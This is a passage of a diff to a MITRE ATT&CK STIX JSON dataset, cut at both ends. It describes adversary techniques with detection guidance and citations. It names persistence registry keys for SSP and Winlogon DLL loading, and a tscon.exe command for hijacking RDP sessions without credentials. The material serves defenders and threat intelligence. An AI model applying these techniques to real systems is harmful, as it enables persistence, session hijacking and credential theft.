"external_id": "T1599.001" + }, + { + "source_name": "RFC1918", + "description": "IETF Network Working Group. (1996, February). Address Allocation for Private Internets. Retrieved October 20, 2020.", + "url": "https://tools.ietf.org/html/rfc1918" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-20T20:16:32.599Z", + "name": "Upload Tool", + "description": "Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.\n\nTools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) Tools can also be staged on web services, such as an adversary controlled GitHub repo, or on Platform-as-a-Service offerings that enable users to easily provision applications.(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Intezer App Service Phishing)\n\nAdversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "If infrastructure or patterns in tooling have been previously identified, internet scanning may uncover when an adversary has staged tools to make them accessible for targeting.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle, such as [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--506f6f49-7045-4156-9007-7474cb44ad6d", + "created": "2021-03-17T20:31:07.828Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1608/002", + "external_id": "T1608.002" + }, + { + "source_name": "Dell TG-3390", + "description": "Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.", + "url": "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage" + }, + { + "source_name": "Malwarebytes Heroku Skimmers", + "description": "Jérôme Segura. (2019, December 4). There's an app for that: web skimmers found on PaaS Heroku. Retrieved August 18, 2022.", + "url": "https://www.malwarebytes.com/blog/news/2019/12/theres-an-app-for-that-web-skimmers-found-on-paas-heroku" + }, + { + "source_name": "Dragos Heroku Watering Hole", + "description": "Kent Backman. (2021, May 18). When Intrusions Don’t Align: A New Water Watering Hole and Oldsmar. Retrieved August 18, 2022.", + "url": "https://www.dragos.com/blog/industry-news/a-new-water-watering-hole/" + }, + { + "source_name": "Intezer App Service Phishing", + "description": "Paul Litvak. (2020, October 8). Kud I Enter Your Server? New Vulnerabilities in Microsoft Azure. Retrieved August 18, 2022.", + "url": "https://www.intezer.com/blog/malware-analysis/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Security Support Provider", + "description": "Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.\n\nThe SSP configuration is stored in two Registry keys: HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages and HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor the Registry for changes to the SSP Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned SSP DLLs try to load into the LSA by setting the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\LSASS.exe with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--5095a853-299c-4876-abd7-ac0050fb5462", + "created": "2020-01-24T17:16:11.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1547/005", + "external_id": "T1547.005" + }, + { + "source_name": "Graeber 2014", + "description": "Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017.", + "url": "http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html" + }, + { + "source_name": "Microsoft Configure LSA", + "description": "Microsoft. (2013, July 31). Configuring Additional LSA Protection. Retrieved June 24, 2015.", + "url": "https://technet.microsoft.com/en-us/library/dn408187.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Data Historian Compromise", + "description": "Adversaries may compromise and gain control of a data historian to gain a foothold into the control system environment. Access to a data historian may be used to learn stored database archival and analysis information on the control system. A dual-homed data historian may provide adversaries an interface from the IT environment to the OT environment. \n\nDragos has released an updated analysis on CrashOverride that outlines the attack from the ICS network breach to payload delivery and execution. (Citation: Industroyer - Dragos - 201810) The report summarized that CrashOverride represents a new application of malware, but relied on standard intrusion techniques. In particular, new artifacts include references to a Microsoft Windows Server 2003 host, with a SQL Server. Within the ICS environment, such a database server can act as a data historian. Dragos noted a device with this role should be \"expected to have extensive connections\" within the ICS environment. Adversary activity leveraged database capabilities to perform reconnaissance, including directory queries and network connectivity checks.\n\nPermissions Required: Administrator\n\nContributors: Joe Slowik - Dragos", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Joe Slowik - Dragos" + ], + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--50d3222f-7550-4a3c-94e1-78cb6c81d064", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0810", + "external_id": "T0810" + }, + { + "source_name": "Industroyer - Dragos - 201810", + "description": "Dragos. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved October 14, 2019.", + "url": "https://dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Winlogon Helper DLL", + "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\\Software\\[Wow6432Node\\]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013) \n\nMalicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n\n* Winlogon\\Notify - points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit - points to userinit.exe, the user initialization program executed when a user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell executed when a user logs on\n\nAdversaries may take advantage of these features to repeatedly execute malicious code and establish Persistence.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Praetorian" + ], + "x_mitre_detection": "Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns) New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious.\n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--514ede4c-78b3-4d78-a38b-daddf6217a79", + "created": "2017-05-31T21:30:20.148Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1004", + "external_id": "T1004" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/579.html", + "external_id": "CAPEC-579" + }, + { + "source_name": "Cylance Reg Persistence Sept 2013", + "description": "Langendorf, S. (2013, September 24). Windows Registry Persistence, Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.", + "url": "https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order" + }, + { + "source_name": "TechNet Autoruns", + "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", + "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Binary Padding", + "description": "Adversaries can use binary padding to add junk data and change the on-disk representation of malware without affecting the functionality or behavior of the binary. This will often increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.\n\nBinary padding effectively changes the checksum of the file and can also be used to avoid hash-based blacklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ)\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Martin Jirkal, ESET" + ], + "x_mitre_detection": "Depending on the method used to pad files, a file-based signature may be capable of detecting padding using a scanning or on-access based tool. \n\nWhen executed, the resulting process from padded files may also exhibit other behavior characteristics of being used to conduct an intrusion such as system and network information Discovery or Lateral Movement, which could be used as event indicators that point to the source file.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Signature-based detection", + "Anti-virus" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--519630c5-f03f-4882-825c-3af924935817", + "created": "2017-05-31T21:30:22.096Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1009", + "external_id": "T1009" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/572.html", + "external_id": "CAPEC-572" + }, + { + "source_name": "ESET OceanLotus", + "description": "Foltýn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.", + "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/" + }, + { + "source_name": "Securelist Malware Tricks April 2017", + "description": "Ishimaru, S.. (2017, April 13). Old Malware Tricks To Bypass Detection in the Age of Big Data. Retrieved May 30, 2019.", + "url": "https://securelist.com/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/78010/" + }, + { + "source_name": "VirusTotal FAQ", + "description": "VirusTotal. (n.d.). VirusTotal FAQ. Retrieved May 23, 2019.", + "url": "https://www.virustotal.com/en/faq/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-28T15:43:30.271Z", + "name": "Use Alternate Authentication Material", + "description": "Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. \n\nAuthentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.(Citation: NIST Authentication)(Citation: NIST MFA)\n\nCaching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system—either in memory or on disk—it may be at risk of being stolen through [Credential Access](https://attack.mitre.org/tactics/TA0006) techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Blake Strom, Microsoft Threat Intelligence", + "Pawel Partyka, Microsoft Threat Intelligence" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Office 365", + "SaaS", + "Google Workspace", + "IaaS", + "Containers" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "System Access Controls" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--51a14c76-dd3b-440b-9c20-2bf91d25a814", + "created": "2020-01-30T16:18:36.873Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1550", + "external_id": "T1550" + }, + { + "source_name": "TechNet Audit Policy", + "description": "Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016.", + "url": "https://technet.microsoft.com/en-us/library/dn487457.aspx" + }, + { + "source_name": "NIST Authentication", + "description": "NIST. (n.d.). Authentication. Retrieved January 30, 2020.", + "url": "https://csrc.nist.gov/glossary/term/authentication" + }, + { + "source_name": "NIST MFA", + "description": "NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January 30, 2020.", + "url": "https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Remote Desktop Protocol", + "description": "Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). (Citation: TechNet Remote Desktop Services) There are other implementations and third-party tools that provide graphical access [Remote Services](https://attack.mitre.org/techniques/T1021) similar to RDS.\n\nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1015) technique for Persistence. (Citation: Alperovitch Malware)\n\nAdversaries may also perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session and prompted with a question. With System permissions and using Terminal Services Console, c:\\windows\\system32\\tscon.exe [session number to be stolen], an adversary can hijack a session without the need for credentials or prompts to the user. (Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions. (Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in RedSnarf. (Citation: Kali Redsnarf)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Matthew Demaske, Adaptforward" + ], + "x_mitre_detection": "Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.\n\nAlso, set up process monitoring for tscon.exe usage and monitor service creation that uses cmd.exe /k or cmd.exe /c in its arguments to prevent RDP session hijacking.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Remote Desktop Users", + "User" + ], + "x_mitre_system_requirements": [ + "RDP service enabled, account in the Remote Desktop Users group." + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--51dea151-0898-4a45-967c-3ebee0420484", + "created": "2017-05-31T21:30:59.769Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1076", + "external_id": "T1076" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/555.html", + "external_id": "CAPEC-555" + }, + { + "source_name": "TechNet Remote Desktop Services", + "description": "Microsoft. (n.d.). Remote Desktop Services. Retrieved June 1, 2016.", + "url": "https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx" + }, + { + "source_name": "Alperovitch Malware", + "description": "Alperovitch, D. (2014, October 31). Malware-Free Intrusions. Retrieved November 4, 2014.", + "url": "http://blog.crowdstrike.com/adversary-tricks-crowdstrike-treats/" + }, + { + "source_name": "RDP Hijacking Korznikov", + "description": "Korznikov, A. (2017, March 17). Passwordless RDP Session Hijacking Feature All Windows versions. Retrieved December 11, 2017.", + "url": "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html" + }, + { + "source_name": "RDP Hijacking Medium", + "description": "Beaumont, K. (2017, March 19). RDP hijacking — how to hijack RDS and RemoteApp sessions transparently to move through an organisation. Retrieved December 11, 2017.", + "url": "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6" + }, + { + "source_name": "Kali Redsnarf", + "description": "NCC Group PLC. (2016, November 1). Kali Redsnarf. Retrieved December 11, 2017.", + "url": "https://github.com/nccgroup/redsnarf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Threat Intel Vendors", + "description": "Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)\n\nAdversaries may search in private threat intelligence vendor data to gather actionable information. Threat actors may seek information/indicators gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. Information reported by vendors may also reveal opportunities other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--51e54974-a541-4fb6-a61b-0518e4c6de41", + "created": "2020-10-02T17:03:45.918Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1597/001", + "external_id": "T1597.001" + }, + { + "source_name": "D3Secutrity CTI Feeds", + "description": "Banerd, W. (2019, April 30). 10 of the Best Open Source Threat Intelligence Feeds. Retrieved October 20, 2020.", + "url": "https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-09-11T16:06:10.376Z", + "name": "Exfiltration Over Other Network Medium", + "description": "Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.\n\nAdversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "exfiltration" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Itzik Kotler, SafeBreach" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.\n\nMonitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--51ea26b1-ff1e-4faa-b1a0-1114cd298c87", + "created": "2017-05-31T21:30:25.159Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1011", + "external_id": "T1011" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Network Device Configuration Dump", + "description": "Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.\n\nAdversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files.(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Identify network traffic sent or received by untrusted hosts or networks. Configure signatures to identify strings that may be found in a network device configuration.(Citation: US-CERT TA18-068A 2018)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--52759bf1-fe12-4052-ace6-c5b0cf7dd7fd", + "created": "2020-10-20T00:08:21.745Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1602/002", + "external_id": "T1602.002" + }, + { + "source_name": "US-CERT TA18-106A Network Infrastructure Devices 2018", + "description": "US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-106A" + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954" + }, + { + "source_name": "US-CERT TA18-068A 2018", + "description": "US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. Retrieved October 2, 2019.", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-19T04:27:00.005Z", + "name": "Gather Victim Identity Information", + "description": "Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about users could also be enumerated via other active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)) such as probing and analyzing responses from authentication services that may reveal valid usernames in a system or permitted MFA /methods associated with those usernames.(Citation: GrimBlog UsernameEnum)(Citation: Obsidian SSPR Abuse 2023) Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: 